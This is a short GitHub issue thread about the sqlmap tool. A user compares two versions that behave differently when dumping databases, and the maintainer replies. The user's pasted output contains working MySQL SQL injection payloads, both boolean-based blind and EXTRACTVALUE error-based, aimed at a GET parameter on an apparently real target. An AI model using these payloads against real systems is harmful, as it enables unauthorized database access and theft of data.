### ISSUE TITLE
sqlmap-1.2.10 vs 1.4.12.30#dev -- database dump

### ISSUE THREAD

**Issue by madaxcrr** [sqlmapproject/sqlmap#4491]
Version 1.4.12.30#dev : Can only dump default database but no tables!
---
Parameter: pt (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: lid=10560&pt=1003&pt=1000'))) AND 4728=4728 AND ((('bykJ'='bykJ&cw=1&vrtype=11&cf=1&sle=1
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: lid=10560&pt=1003&pt=1000'))) AND EXTRACTVALUE(9816,CONCAT(0x5c,0x71707a6b71,(SELECT (ELT(9816=9816,1))),0x716b707071)) AND ((('AQYa'='AQYa&cw=1&vrtype=11&cf=1&sle=1
    Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
---

Version 1.2.10 : Correctly dump all databases and tables.

Parameter: pt (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: lid=10560&pt=1003&pt=1000))) AND 5284=(SELECT (CASE WHEN (5284=5284) THEN 5284 ELSE (SELECT 1411 UNION SELECT 1587) END))-- sVZK&cw=1&vrtype=11&cf=1&sle=1
    Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: lid=10560&pt=1003&pt=1000))) AND EXTRACTVALUE(4107,CONCAT(0x5c,0x717a627071,(SELECT (ELT(4107=4107,1))),0x716a766b71)) AND (((3182=3182&cw=1&vrtype=11&cf=1&sle=1
    Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
---

Thanks

**Comment by stamparm** [comment]
`Version 1.4.12.30#dev : Can only dump default database but no tables!` <- I like this kind of easy to solve (unreproducible) issues:

![1](https://user-images.githubusercontent.com/921555/102937272-0c836980-44aa-11eb-9f1c-67f2e375901d.png)

**Comment by madaxcrr** [comment]
Version 1.4.12.30#dev add this quote in the payload and throw an error when --dbs and --tables
Version 1.2.10 works like a charm.
